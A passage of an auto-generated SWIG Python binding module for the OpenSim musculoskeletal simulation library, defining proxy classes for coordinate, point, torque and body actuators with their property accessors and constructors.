----------
i: int
value: std::string const &
set_coordinate(CoordinateActuator self, std::string const & value)
Parameters
----------
value: std::string const &
"""
return _actuators.CoordinateActuator_set_coordinate(self, *args)
def copyProperty_optimal_force(self, source):
"""
copyProperty_optimal_force(CoordinateActuator self, CoordinateActuator source)
Parameters
----------
source: OpenSim::CoordinateActuator::Self const &
"""
return _actuators.CoordinateActuator_copyProperty_optimal_force(self, source)
def append_optimal_force(self, value):
"""
append_optimal_force(CoordinateActuator self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.CoordinateActuator_append_optimal_force(self, value)
def constructProperty_optimal_force(self, initValue):
"""
constructProperty_optimal_force(CoordinateActuator self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.CoordinateActuator_constructProperty_optimal_force(self, initValue)
def get_optimal_force(self, *args):
"""
get_optimal_force(CoordinateActuator self, int i) -> double const
Parameters
----------
i: int
get_optimal_force(CoordinateActuator self) -> double const &
Parameters
----------
self: OpenSim::CoordinateActuator const *
"""
return _actuators.CoordinateActuator_get_optimal_force(self, *args)
def upd_optimal_force(self, *args):
"""
upd_optimal_force(CoordinateActuator self, int i) -> double
Parameters
----------
i: int
upd_optimal_force(CoordinateActuator self) -> double &
Parameters
----------
self: OpenSim::CoordinateActuator *
"""
return _actuators.CoordinateActuator_upd_optimal_force(self, *args)
def set_optimal_force(self, *args):
"""
set_optimal_force(CoordinateActuator self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_optimal_force(CoordinateActuator self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.CoordinateActuator_set_optimal_force(self, *args)
def __init__(self, *args):
"""
__init__(OpenSim::CoordinateActuator self, std::string const & coordinateName) -> CoordinateActuator
Parameters
----------
coordinateName: std::string const &
__init__(OpenSim::CoordinateActuator self) -> CoordinateActuator
"""
this = _actuators.new_CoordinateActuator(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def setOptimalForce(self, optimalForce):
"""
setOptimalForce(CoordinateActuator self, double optimalForce)
Parameters
----------
optimalForce: double
"""
return _actuators.CoordinateActuator_setOptimalForce(self, optimalForce)
def getOptimalForce(self):
"""
getOptimalForce(CoordinateActuator self) -> double
Parameters
----------
self: OpenSim::CoordinateActuator const *
"""
return _actuators.CoordinateActuator_getOptimalForce(self)
def CreateForceSetOfCoordinateActuatorsForModel(s, aModel, aOptimalForce=1, aIncludeLockedAndConstrainedCoordinates=True):
"""
CreateForceSetOfCoordinateActuatorsForModel(State s, Model aModel, double aOptimalForce=1, bool aIncludeLockedAndConstrainedCoordinates=True) -> ForceSet
Parameters
----------
s: SimTK::State const &
aModel: OpenSim::Model &
aOptimalForce: double
aIncludeLockedAndConstrainedCoordinates: bool
CreateForceSetOfCoordinateActuatorsForModel(State s, Model aModel, double aOptimalForce=1) -> ForceSet
Parameters
----------
s: SimTK::State const &
aModel: OpenSim::Model &
aOptimalForce: double
CreateForceSetOfCoordinateActuatorsForModel(State s, Model aModel) -> ForceSet
Parameters
----------
s: SimTK::State const &
aModel: OpenSim::Model &
"""
return _actuators.CoordinateActuator_CreateForceSetOfCoordinateActuatorsForModel(s, aModel, aOptimalForce, aIncludeLockedAndConstrainedCoordinates)
CreateForceSetOfCoordinateActuatorsForModel = staticmethod(CreateForceSetOfCoordinateActuatorsForModel)
def isCoordinateValid(self):
"""
isCoordinateValid(CoordinateActuator self) -> bool
Parameters
----------
self: OpenSim::CoordinateActuator const *
"""
return _actuators.CoordinateActuator_isCoordinateValid(self)
def getSpeed(self, s):
"""
getSpeed(CoordinateActuator self, State s) -> double
Parameters
----------
s: SimTK::State const &
"""
return _actuators.CoordinateActuator_getSpeed(self, s)
def setCoordinate(self, aCoordinate):
"""
setCoordinate(CoordinateActuator self, Coordinate aCoordinate)
Parameters
----------
aCoordinate: OpenSim::Coordinate *
"""
return _actuators.CoordinateActuator_setCoordinate(self, aCoordinate)
def getCoordinate(self):
"""
getCoordinate(CoordinateActuator self) -> Coordinate
Parameters
----------
self: OpenSim::CoordinateActuator const *
"""
return _actuators.CoordinateActuator_getCoordinate(self)
__swig_destroy__ = _actuators.delete_CoordinateActuator
__del__ = lambda self: None
CoordinateActuator_swigregister = _actuators.CoordinateActuator_swigregister
CoordinateActuator_swigregister(CoordinateActuator)
def CoordinateActuator_safeDownCast(obj):
"""
CoordinateActuator_safeDownCast(OpenSimObject obj) -> CoordinateActuator
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.CoordinateActuator_safeDownCast(obj)
def CoordinateActuator_getClassName():
"""CoordinateActuator_getClassName() -> std::string const &"""
return _actuators.CoordinateActuator_getClassName()
def CoordinateActuator_CreateForceSetOfCoordinateActuatorsForModel(s, aModel, aOptimalForce=1, aIncludeLockedAndConstrainedCoordinates=True):
"""
CreateForceSetOfCoordinateActuatorsForModel(State s, Model aModel, double aOptimalForce=1, bool aIncludeLockedAndConstrainedCoordinates=True) -> ForceSet
Parameters
----------
s: SimTK::State const &
aModel: OpenSim::Model &
aOptimalForce: double
aIncludeLockedAndConstrainedCoordinates: bool
CreateForceSetOfCoordinateActuatorsForModel(State s, Model aModel, double aOptimalForce=1) -> ForceSet
Parameters
----------
s: SimTK::State const &
aModel: OpenSim::Model &
aOptimalForce: double
CoordinateActuator_CreateForceSetOfCoordinateActuatorsForModel(State s, Model aModel) -> ForceSet
Parameters
----------
s: SimTK::State const &
aModel: OpenSim::Model &
"""
return _actuators.CoordinateActuator_CreateForceSetOfCoordinateActuatorsForModel(s, aModel, aOptimalForce, aIncludeLockedAndConstrainedCoordinates)
class PointActuator(opensim.simulation.ScalarActuator):
"""Proxy of C++ OpenSim::PointActuator class."""
__swig_setmethods__ = {}
for _s in [opensim.simulation.ScalarActuator]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, PointActuator, name, value)
__swig_getmethods__ = {}
for _s in [opensim.simulation.ScalarActuator]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, PointActuator, name)
__repr__ = _swig_repr
def safeDownCast(obj):
"""
safeDownCast(OpenSimObject obj) -> PointActuator
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.PointActuator_safeDownCast(obj)
safeDownCast = staticmethod(safeDownCast)
def assign(self, aObject):
"""
assign(PointActuator self, OpenSimObject aObject)
Parameters
----------
aObject: OpenSim::Object &
"""
return _actuators.PointActuator_assign(self, aObject)
def getClassName():
"""getClassName() -> std::string const &"""
return _actuators.PointActuator_getClassName()
getClassName = staticmethod(getClassName)
def clone(self):
"""
clone(PointActuator self) -> PointActuator
Parameters
----------
self: OpenSim::PointActuator const *
"""
return _actuators.PointActuator_clone(self)
def getConcreteClassName(self):
"""
getConcreteClassName(PointActuator self) -> std::string const &
Parameters
----------
self: OpenSim::PointActuator const *
"""
return _actuators.PointActuator_getConcreteClassName(self)
def copyProperty_body(self, source):
"""
copyProperty_body(PointActuator self, PointActuator source)
Parameters
----------
source: OpenSim::PointActuator::Self const &
"""
return _actuators.PointActuator_copyProperty_body(self, source)
def append_body(self, value):
"""
append_body(PointActuator self, std::string const & value) -> int
Parameters
----------
value: std::string const &
"""
return _actuators.PointActuator_append_body(self, value)
def constructProperty_body(self, *args):
"""
constructProperty_body(PointActuator self)
constructProperty_body(PointActuator self, std::string const & initValue)
Parameters
----------
initValue: std::string const &
"""
return _actuators.PointActuator_constructProperty_body(self, *args)
def get_body(self, *args):
"""
get_body(PointActuator self, int i) -> std::string const
Parameters
----------
i: int
get_body(PointActuator self) -> std::string const &
Parameters
----------
self: OpenSim::PointActuator const *
"""
return _actuators.PointActuator_get_body(self, *args)
def upd_body(self, *args):
"""
upd_body(PointActuator self, int i) -> std::string
Parameters
----------
i: int
upd_body(PointActuator self) -> std::string &
Parameters
----------
self: OpenSim::PointActuator *
"""
return _actuators.PointActuator_upd_body(self, *args)
def set_body(self, *args):
"""
set_body(PointActuator self, int i, std::string const & value)
Parameters
----------
i: int
value: std::string const &
set_body(PointActuator self, std::string const & value)
Parameters
----------
value: std::string const &
"""
return _actuators.PointActuator_set_body(self, *args)
def copyProperty_point(self, source):
"""
copyProperty_point(PointActuator self, PointActuator source)
Parameters
----------
source: OpenSim::PointActuator::Self const &
"""
return _actuators.PointActuator_copyProperty_point(self, source)
def append_point(self, value):
"""
append_point(PointActuator self, Vec3 value) -> int
Parameters
----------
value: SimTK::Vec3 const &
"""
return _actuators.PointActuator_append_point(self, value)
def constructProperty_point(self, initValue):
"""
constructProperty_point(PointActuator self, Vec3 initValue)
Parameters
----------
initValue: SimTK::Vec3 const &
"""
return _actuators.PointActuator_constructProperty_point(self, initValue)
def get_point(self, *args):
"""
get_point(PointActuator self, int i) -> Vec3
Parameters
----------
i: int
get_point(PointActuator self) -> Vec3
Parameters
----------
self: OpenSim::PointActuator const *
"""
return _actuators.PointActuator_get_point(self, *args)
def upd_point(self, *args):
"""
upd_point(PointActuator self, int i) -> Vec3
Parameters
----------
i: int
upd_point(PointActuator self) -> Vec3
Parameters
----------
self: OpenSim::PointActuator *
"""
return _actuators.PointActuator_upd_point(self, *args)
def set_point(self, *args):
"""
set_point(PointActuator self, int i, Vec3 value)
Parameters
----------
i: int
value: SimTK::Vec3 const &
set_point(PointActuator self, Vec3 value)
Parameters
----------
value: SimTK::Vec3 const &
"""
return _actuators.PointActuator_set_point(self, *args)
def copyProperty_point_is_global(self, source):
"""
copyProperty_point_is_global(PointActuator self, PointActuator source)
Parameters
----------
source: OpenSim::PointActuator::Self const &
"""
return _actuators.PointActuator_copyProperty_point_is_global(self, source)
def append_point_is_global(self, value):
"""
append_point_is_global(PointActuator self, bool const & value) -> int
Parameters
----------
value: bool const &
"""
return _actuators.PointActuator_append_point_is_global(self, value)
def constructProperty_point_is_global(self, initValue):
"""
constructProperty_point_is_global(PointActuator self, bool const & initValue)
Parameters
----------
initValue: bool const &
"""
return _actuators.PointActuator_constructProperty_point_is_global(self, initValue)
def get_point_is_global(self, *args):
"""
get_point_is_global(PointActuator self, int i) -> bool const
Parameters
----------
i: int
get_point_is_global(PointActuator self) -> bool const &
Parameters
----------
self: OpenSim::PointActuator const *
"""
return _actuators.PointActuator_get_point_is_global(self, *args)
def upd_point_is_global(self, *args):
"""
upd_point_is_global(PointActuator self, int i) -> bool
Parameters
----------
i: int
upd_point_is_global(PointActuator self) -> bool &
Parameters
----------
self: OpenSim::PointActuator *
"""
return _actuators.PointActuator_upd_point_is_global(self, *args)
def set_point_is_global(self, *args):
"""
set_point_is_global(PointActuator self, int i, bool const & value)
Parameters
----------
i: int
value: bool const &
set_point_is_global(PointActuator self, bool const & value)
Parameters
----------
value: bool const &
"""
return _actuators.PointActuator_set_point_is_global(self, *args)
def copyProperty_direction(self, source):
"""
copyProperty_direction(PointActuator self, PointActuator source)
Parameters
----------
source: OpenSim::PointActuator::Self const &
"""
return _actuators.PointActuator_copyProperty_direction(self, source)
def append_direction(self, value):
"""
append_direction(PointActuator self, Vec3 value) -> int
Parameters
----------
value: SimTK::Vec3 const &
"""
return _actuators.PointActuator_append_direction(self, value)
def constructProperty_direction(self, initValue):
"""
constructProperty_direction(PointActuator self, Vec3 initValue)
Parameters
----------
initValue: SimTK::Vec3 const &
"""
return _actuators.PointActuator_constructProperty_direction(self, initValue)
def get_direction(self, *args):
"""
get_direction(PointActuator self, int i) -> Vec3
Parameters
----------
i: int
get_direction(PointActuator self) -> Vec3
Parameters
----------
self: OpenSim::PointActuator const *
"""
return _actuators.PointActuator_get_direction(self, *args)
def upd_direction(self, *args):
"""
upd_direction(PointActuator self, int i) -> Vec3
Parameters
----------
i: int
upd_direction(PointActuator self) -> Vec3
Parameters
----------
self: OpenSim::PointActuator *
"""
return _actuators.PointActuator_upd_direction(self, *args)
def set_direction(self, *args):
"""
set_direction(PointActuator self, int i, Vec3 value)
Parameters
----------
i: int
value: SimTK::Vec3 const &
set_direction(PointActuator self, Vec3 value)
Parameters
----------
value: SimTK::Vec3 const &
"""
return _actuators.PointActuator_set_direction(self, *args)
def copyProperty_force_is_global(self, source):
"""
copyProperty_force_is_global(PointActuator self, PointActuator source)
Parameters
----------
source: OpenSim::PointActuator::Self const &
"""
return _actuators.PointActuator_copyProperty_force_is_global(self, source)
def append_force_is_global(self, value):
"""
append_force_is_global(PointActuator self, bool const & value) -> int
Parameters
----------
value: bool const &
"""
return _actuators.PointActuator_append_force_is_global(self, value)
def constructProperty_force_is_global(self, initValue):
"""
constructProperty_force_is_global(PointActuator self, bool const & initValue)
Parameters
----------
initValue: bool const &
"""
return _actuators.PointActuator_constructProperty_force_is_global(self, initValue)
def get_force_is_global(self, *args):
"""
get_force_is_global(PointActuator self, int i) -> bool const
Parameters
----------
i: int
get_force_is_global(PointActuator self) -> bool const &
Parameters
----------
self: OpenSim::PointActuator const *
"""
return _actuators.PointActuator_get_force_is_global(self, *args)
def upd_force_is_global(self, *args):
"""
upd_force_is_global(PointActuator self, int i) -> bool
Parameters
----------
i: int
upd_force_is_global(PointActuator self) -> bool &
Parameters
----------
self: OpenSim::PointActuator *
"""
return _actuators.PointActuator_upd_force_is_global(self, *args)
def set_force_is_global(self, *args):
"""
set_force_is_global(PointActuator self, int i, bool const & value)
Parameters
----------
i: int
value: bool const &
set_force_is_global(PointActuator self, bool const & value)
Parameters
----------
value: bool const &
"""
return _actuators.PointActuator_set_force_is_global(self, *args)
def copyProperty_optimal_force(self, source):
"""
copyProperty_optimal_force(PointActuator self, PointActuator source)
Parameters
----------
source: OpenSim::PointActuator::Self const &
"""
return _actuators.PointActuator_copyProperty_optimal_force(self, source)
def append_optimal_force(self, value):
"""
append_optimal_force(PointActuator self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.PointActuator_append_optimal_force(self, value)
def constructProperty_optimal_force(self, initValue):
"""
constructProperty_optimal_force(PointActuator self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.PointActuator_constructProperty_optimal_force(self, initValue)
def get_optimal_force(self, *args):
"""
get_optimal_force(PointActuator self, int i) -> double const
Parameters
----------
i: int
get_optimal_force(PointActuator self) -> double const &
Parameters
----------
self: OpenSim::PointActuator const *
"""
return _actuators.PointActuator_get_optimal_force(self, *args)
def upd_optimal_force(self, *args):
"""
upd_optimal_force(PointActuator self, int i) -> double
Parameters
----------
i: int
upd_optimal_force(PointActuator self) -> double &
Parameters
----------
self: OpenSim::PointActuator *
"""
return _actuators.PointActuator_upd_optimal_force(self, *args)
def set_optimal_force(self, *args):
"""
set_optimal_force(PointActuator self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_optimal_force(PointActuator self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.PointActuator_set_optimal_force(self, *args)
def __init__(self, *args):
"""
__init__(OpenSim::PointActuator self, std::string const & bodyName) -> PointActuator
Parameters
----------
bodyName: std::string const &
__init__(OpenSim::PointActuator self) -> PointActuator
"""
this = _actuators.new_PointActuator(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def setOptimalForce(self, aOptimalForce):
"""
setOptimalForce(PointActuator self, double aOptimalForce)
Parameters
----------
aOptimalForce: double
"""
return _actuators.PointActuator_setOptimalForce(self, aOptimalForce)
def getOptimalForce(self):
"""
getOptimalForce(PointActuator self) -> double
Parameters
----------
self: OpenSim::PointActuator const *
"""
return _actuators.PointActuator_getOptimalForce(self)
__swig_destroy__ = _actuators.delete_PointActuator
__del__ = lambda self: None
PointActuator_swigregister = _actuators.PointActuator_swigregister
PointActuator_swigregister(PointActuator)
def PointActuator_safeDownCast(obj):
"""
PointActuator_safeDownCast(OpenSimObject obj) -> PointActuator
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.PointActuator_safeDownCast(obj)
def PointActuator_getClassName():
"""PointActuator_getClassName() -> std::string const &"""
return _actuators.PointActuator_getClassName()
class TorqueActuator(opensim.simulation.ScalarActuator):
"""Proxy of C++ OpenSim::TorqueActuator class."""
__swig_setmethods__ = {}
for _s in [opensim.simulation.ScalarActuator]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, TorqueActuator, name, value)
__swig_getmethods__ = {}
for _s in [opensim.simulation.ScalarActuator]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, TorqueActuator, name)
__repr__ = _swig_repr
def safeDownCast(obj):
"""
safeDownCast(OpenSimObject obj) -> TorqueActuator
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.TorqueActuator_safeDownCast(obj)
safeDownCast = staticmethod(safeDownCast)
def assign(self, aObject):
"""
assign(TorqueActuator self, OpenSimObject aObject)
Parameters
----------
aObject: OpenSim::Object &
"""
return _actuators.TorqueActuator_assign(self, aObject)
def getClassName():
"""getClassName() -> std::string const &"""
return _actuators.TorqueActuator_getClassName()
getClassName = staticmethod(getClassName)
def clone(self):
"""
clone(TorqueActuator self) -> TorqueActuator
Parameters
----------
self: OpenSim::TorqueActuator const *
"""
return _actuators.TorqueActuator_clone(self)
def getConcreteClassName(self):
"""
getConcreteClassName(TorqueActuator self) -> std::string const &
Parameters
----------
self: OpenSim::TorqueActuator const *
"""
return _actuators.TorqueActuator_getConcreteClassName(self)
def copyProperty_bodyA(self, source):
"""
copyProperty_bodyA(TorqueActuator self, TorqueActuator source)
Parameters
----------
source: OpenSim::TorqueActuator::Self const &
"""
return _actuators.TorqueActuator_copyProperty_bodyA(self, source)
def append_bodyA(self, value):
"""
append_bodyA(TorqueActuator self, std::string const & value) -> int
Parameters
----------
value: std::string const &
"""
return _actuators.TorqueActuator_append_bodyA(self, value)
def constructProperty_bodyA(self, *args):
"""
constructProperty_bodyA(TorqueActuator self)
constructProperty_bodyA(TorqueActuator self, std::string const & initValue)
Parameters
----------
initValue: std::string const &
"""
return _actuators.TorqueActuator_constructProperty_bodyA(self, *args)
def get_bodyA(self, *args):
"""
get_bodyA(TorqueActuator self, int i) -> std::string const
Parameters
----------
i: int
get_bodyA(TorqueActuator self) -> std::string const &
Parameters
----------
self: OpenSim::TorqueActuator const *
"""
return _actuators.TorqueActuator_get_bodyA(self, *args)
def upd_bodyA(self, *args):
"""
upd_bodyA(TorqueActuator self, int i) -> std::string
Parameters
----------
i: int
upd_bodyA(TorqueActuator self) -> std::string &
Parameters
----------
self: OpenSim::TorqueActuator *
"""
return _actuators.TorqueActuator_upd_bodyA(self, *args)
def set_bodyA(self, *args):
"""
set_bodyA(TorqueActuator self, int i, std::string const & value)
Parameters
----------
i: int
value: std::string const &
set_bodyA(TorqueActuator self, std::string const & value)
Parameters
----------
value: std::string const &
"""
return _actuators.TorqueActuator_set_bodyA(self, *args)
def copyProperty_bodyB(self, source):
"""
copyProperty_bodyB(TorqueActuator self, TorqueActuator source)
Parameters
----------
source: OpenSim::TorqueActuator::Self const &
"""
return _actuators.TorqueActuator_copyProperty_bodyB(self, source)
def append_bodyB(self, value):
"""
append_bodyB(TorqueActuator self, std::string const & value) -> int
Parameters
----------
value: std::string const &
"""
return _actuators.TorqueActuator_append_bodyB(self, value)
def constructProperty_bodyB(self, *args):
"""
constructProperty_bodyB(TorqueActuator self)
constructProperty_bodyB(TorqueActuator self, std::string const & initValue)
Parameters
----------
initValue: std::string const &
"""
return _actuators.TorqueActuator_constructProperty_bodyB(self, *args)
def get_bodyB(self, *args):
"""
get_bodyB(TorqueActuator self, int i) -> std::string const
Parameters
----------
i: int
get_bodyB(TorqueActuator self) -> std::string const &
Parameters
----------
self: OpenSim::TorqueActuator const *
"""
return _actuators.TorqueActuator_get_bodyB(self, *args)
def upd_bodyB(self, *args):
"""
upd_bodyB(TorqueActuator self, int i) -> std::string
Parameters
----------
i: int
upd_bodyB(TorqueActuator self) -> std::string &
Parameters
----------
self: OpenSim::TorqueActuator *
"""
return _actuators.TorqueActuator_upd_bodyB(self, *args)
def set_bodyB(self, *args):
"""
set_bodyB(TorqueActuator self, int i, std::string const & value)
Parameters
----------
i: int
value: std::string const &
set_bodyB(TorqueActuator self, std::string const & value)
Parameters
----------
value: std::string const &
"""
return _actuators.TorqueActuator_set_bodyB(self, *args)
def copyProperty_torque_is_global(self, source):
"""
copyProperty_torque_is_global(TorqueActuator self, TorqueActuator source)
Parameters
----------
source: OpenSim::TorqueActuator::Self const &
"""
return _actuators.TorqueActuator_copyProperty_torque_is_global(self, source)
def append_torque_is_global(self, value):
"""
append_torque_is_global(TorqueActuator self, bool const & value) -> int
Parameters
----------
value: bool const &
"""
return _actuators.TorqueActuator_append_torque_is_global(self, value)
def constructProperty_torque_is_global(self, initValue):
"""
constructProperty_torque_is_global(TorqueActuator self, bool const & initValue)
Parameters
----------
initValue: bool const &
"""
return _actuators.TorqueActuator_constructProperty_torque_is_global(self, initValue)
def get_torque_is_global(self, *args):
"""
get_torque_is_global(TorqueActuator self, int i) -> bool const
Parameters
----------
i: int
get_torque_is_global(TorqueActuator self) -> bool const &
Parameters
----------
self: OpenSim::TorqueActuator const *
"""
return _actuators.TorqueActuator_get_torque_is_global(self, *args)
def upd_torque_is_global(self, *args):
"""
upd_torque_is_global(TorqueActuator self, int i) -> bool
Parameters
----------
i: int
upd_torque_is_global(TorqueActuator self) -> bool &
Parameters
----------
self: OpenSim::TorqueActuator *
"""
return _actuators.TorqueActuator_upd_torque_is_global(self, *args)
def set_torque_is_global(self, *args):
"""
set_torque_is_global(TorqueActuator self, int i, bool const & value)
Parameters
----------
i: int
value: bool const &
set_torque_is_global(TorqueActuator self, bool const & value)
Parameters
----------
value: bool const &
"""
return _actuators.TorqueActuator_set_torque_is_global(self, *args)
def copyProperty_axis(self, source):
"""
copyProperty_axis(TorqueActuator self, TorqueActuator source)
Parameters
----------
source: OpenSim::TorqueActuator::Self const &
"""
return _actuators.TorqueActuator_copyProperty_axis(self, source)
def append_axis(self, value):
"""
append_axis(TorqueActuator self, Vec3 value) -> int
Parameters
----------
value: SimTK::Vec3 const &
"""
return _actuators.TorqueActuator_append_axis(self, value)
def constructProperty_axis(self, initValue):
"""
constructProperty_axis(TorqueActuator self, Vec3 initValue)
Parameters
----------
initValue: SimTK::Vec3 const &
"""
return _actuators.TorqueActuator_constructProperty_axis(self, initValue)
def get_axis(self, *args):
"""
get_axis(TorqueActuator self, int i) -> Vec3
Parameters
----------
i: int
get_axis(TorqueActuator self) -> Vec3
Parameters
----------
self: OpenSim::TorqueActuator const *
"""
return _actuators.TorqueActuator_get_axis(self, *args)
def upd_axis(self, *args):
"""
upd_axis(TorqueActuator self, int i) -> Vec3
Parameters
----------
i: int
upd_axis(TorqueActuator self) -> Vec3
Parameters
----------
self: OpenSim::TorqueActuator *
"""
return _actuators.TorqueActuator_upd_axis(self, *args)
def set_axis(self, *args):
"""
set_axis(TorqueActuator self, int i, Vec3 value)
Parameters
----------
i: int
value: SimTK::Vec3 const &
set_axis(TorqueActuator self, Vec3 value)
Parameters
----------
value: SimTK::Vec3 const &
"""
return _actuators.TorqueActuator_set_axis(self, *args)
def copyProperty_optimal_force(self, source):
"""
copyProperty_optimal_force(TorqueActuator self, TorqueActuator source)
Parameters
----------
source: OpenSim::TorqueActuator::Self const &
"""
return _actuators.TorqueActuator_copyProperty_optimal_force(self, source)
def append_optimal_force(self, value):
"""
append_optimal_force(TorqueActuator self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.TorqueActuator_append_optimal_force(self, value)
def constructProperty_optimal_force(self, initValue):
"""
constructProperty_optimal_force(TorqueActuator self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.TorqueActuator_constructProperty_optimal_force(self, initValue)
def get_optimal_force(self, *args):
"""
get_optimal_force(TorqueActuator self, int i) -> double const
Parameters
----------
i: int
get_optimal_force(TorqueActuator self) -> double const &
Parameters
----------
self: OpenSim::TorqueActuator const *
"""
return _actuators.TorqueActuator_get_optimal_force(self, *args)
def upd_optimal_force(self, *args):
"""
upd_optimal_force(TorqueActuator self, int i) -> double
Parameters
----------
i: int
upd_optimal_force(TorqueActuator self) -> double &
Parameters
----------
self: OpenSim::TorqueActuator *
"""
return _actuators.TorqueActuator_upd_optimal_force(self, *args)
def set_optimal_force(self, *args):
"""
set_optimal_force(TorqueActuator self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_optimal_force(TorqueActuator self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.TorqueActuator_set_optimal_force(self, *args)
def __init__(self, *args):
"""
__init__(OpenSim::TorqueActuator self) -> TorqueActuator
__init__(OpenSim::TorqueActuator self, PhysicalFrame bodyA, PhysicalFrame bodyB, Vec3 axis, bool axisInGround=True) -> TorqueActuator
Parameters
----------
bodyA: OpenSim::PhysicalFrame const &
bodyB: OpenSim::PhysicalFrame const &
axis: SimTK::Vec3 const &
axisInGround: bool
__init__(OpenSim::TorqueActuator self, PhysicalFrame bodyA, PhysicalFrame bodyB, Vec3 axis) -> TorqueActuator
Parameters
----------
bodyA: OpenSim::PhysicalFrame const &
bodyB: OpenSim::PhysicalFrame const &
axis: SimTK::Vec3 const &
"""
this = _actuators.new_TorqueActuator(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def setAxis(self, axis):
"""
setAxis(TorqueActuator self, Vec3 axis)
Parameters
----------
axis: SimTK::Vec3 const &
"""
return _actuators.TorqueActuator_setAxis(self, axis)
def getAxis(self):
"""
getAxis(TorqueActuator self) -> Vec3
Parameters
----------
self: OpenSim::TorqueActuator const *
"""
return _actuators.TorqueActuator_getAxis(self)
def setTorqueIsGlobal(self, isGlobal):
"""
setTorqueIsGlobal(TorqueActuator self, bool isGlobal)
Parameters
----------
isGlobal: bool
"""
return _actuators.TorqueActuator_setTorqueIsGlobal(self, isGlobal)
def getTorqueIsGlobal(self):
"""
getTorqueIsGlobal(TorqueActuator self) -> bool
Parameters
----------
self: OpenSim::TorqueActuator const *
"""
return _actuators.TorqueActuator_getTorqueIsGlobal(self)
def setOptimalForce(self, optimalForce):
"""
setOptimalForce(TorqueActuator self, double optimalForce)
Parameters
----------
optimalForce: double
"""
return _actuators.TorqueActuator_setOptimalForce(self, optimalForce)
def getOptimalForce(self):
"""
getOptimalForce(TorqueActuator self) -> double
Parameters
----------
self: OpenSim::TorqueActuator const *
"""
return _actuators.TorqueActuator_getOptimalForce(self)
def setBodyA(self, body):
"""
setBodyA(TorqueActuator self, PhysicalFrame body)
Parameters
----------
body: OpenSim::PhysicalFrame const &
"""
return _actuators.TorqueActuator_setBodyA(self, body)
def setBodyB(self, body):
"""
setBodyB(TorqueActuator self, PhysicalFrame body)
Parameters
----------
body: OpenSim::PhysicalFrame const &
"""
return _actuators.TorqueActuator_setBodyB(self, body)
def getBodyA(self):
"""
getBodyA(TorqueActuator self) -> PhysicalFrame
Parameters
----------
self: OpenSim::TorqueActuator const *
"""
return _actuators.TorqueActuator_getBodyA(self)
def getBodyB(self):
"""
getBodyB(TorqueActuator self) -> PhysicalFrame
Parameters
----------
self: OpenSim::TorqueActuator const *
"""
return _actuators.TorqueActuator_getBodyB(self)
__swig_destroy__ = _actuators.delete_TorqueActuator
__del__ = lambda self: None
TorqueActuator_swigregister = _actuators.TorqueActuator_swigregister
TorqueActuator_swigregister(TorqueActuator)
def TorqueActuator_safeDownCast(obj):
"""
TorqueActuator_safeDownCast(OpenSimObject obj) -> TorqueActuator
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.TorqueActuator_safeDownCast(obj)
def TorqueActuator_getClassName():
"""TorqueActuator_getClassName() -> std::string const &"""
return _actuators.TorqueActuator_getClassName()
class BodyActuator(opensim.simulation.Actuator):
"""Proxy of C++ OpenSim::BodyActuator class."""
__swig_setmethods__ = {}
for _s in [opensim.simulation.Actuator]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, BodyActuator, name, value)
__swig_getmethods__ = {}
for _s in [opensim.simulation.Actuator]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, BodyActuator, name)
__repr__ = _swig_repr
def safeDownCast(obj):
"""
safeDownCast(OpenSimObject obj) -> BodyActuator
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.BodyActuator_safeDownCast(obj)
safeDownCast = staticmethod(safeDownCast)
def assign(self, aObject):
"""
assign(BodyActuator self, OpenSimObject aObject)
Parameters
----------
aObject: OpenSim::Object &
"""
return _actuators.BodyActuator_assign(self, aObject)
def getClassName():
"""getClassName() -> std::string const &"""
return _actuators.BodyActuator_getClassName()
getClassName = staticmethod(getClassName)
def clone(self):
"""
clone(BodyActuator self) -> BodyActuator
Parameters
----------
self: OpenSim::BodyActuator const *
"""
return _actuators.BodyActuator_clone(self)
def getConcreteClassName(self):
"""
getConcreteClassName(BodyActuator self) -> std::string const &
Parameters
----------
self: OpenSim::BodyActuator const *
"""
return _actuators.BodyActuator_getConcreteClassName(self)
def copyProperty_point(self, source):
"""
copyProperty_point(BodyActuator self, BodyActuator source)
Parameters
----------
source: OpenSim::BodyActuator::Self const &
"""
return _actuators.BodyActuator_copyProperty_point(self, source)
def append_point(self, value):
"""
append_point(BodyActuator self, Vec3 value) -> int
Parameters
----------
value: SimTK::Vec3 const &
"""
return _actuators.BodyActuator_append_point(self, value)
def constructProperty_point(self, initValue):
"""
constructProperty_point(BodyActuator self, Vec3 initValue)
Parameters
----------
initValue: SimTK::Vec3 const &
"""
return _actuators.BodyActuator_constructProperty_point(self, initValue)
def get_point(self, *args):
"""
get_point(BodyActuator self, int i) -> Vec3
Parameters
----------
i: int
get_point(BodyActuator self) -> Vec3
Parameters
----------
self: OpenSim::BodyActuator const *
"""
